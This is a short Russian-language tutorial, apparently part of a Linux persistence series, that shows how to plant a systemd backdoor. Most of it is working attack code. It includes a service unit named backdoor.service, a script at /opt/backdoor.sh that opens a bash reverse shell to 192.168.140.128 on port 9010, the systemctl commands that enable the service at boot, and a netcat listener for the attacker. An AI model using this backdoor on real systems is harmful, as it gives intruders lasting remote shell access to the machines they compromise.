# 05 - Systemd

systemd — это система инициализации и менеджер служб в большинстве дистрибутивов Linux. Загружает пользовательское пространство и дальше управляет системными процессами.\
Значит создав собственную вредоносную службу systemd, мы можем получить бэкдор, который будет запускаться автоматически при запуске ОС.\
Для этого нам понадобится 2 файла:

1. Файл службы systemD
2. Файл  вредоносного скрипта (который отдаст нам revers shell)

```bash
// Создаем файл службы /etc/systemd/system/backdoor.service
[Unit]
Description=backdoor service
After=network.target

[Service]
Type=simple
ExecStart=/opt/backdoor.sh
Restart=on-abort

[Install]
WantedBy=multi-user.target
```

```bash
// Создаем файл вредоносного скрипта /opt/backdoor.sh
#!/usr/bin/bash
/bin/bash -i >& /dev/tcp/192.168.140.128/9010 0>&1
```

```bash
// Перезапускаем службы и добавляем наш сервис в автозагрузку
systemctl daemon-reload
systemctl enable backdoor.service
systemctl start backdoor.service

```

```bash
// На хосте атакующего запускам netcat 
nc -lvp 9010
```

Мы получим шелл после команды systemctl start backdoor.service  и каждый раз когда атакуемый хост будет перезагружен.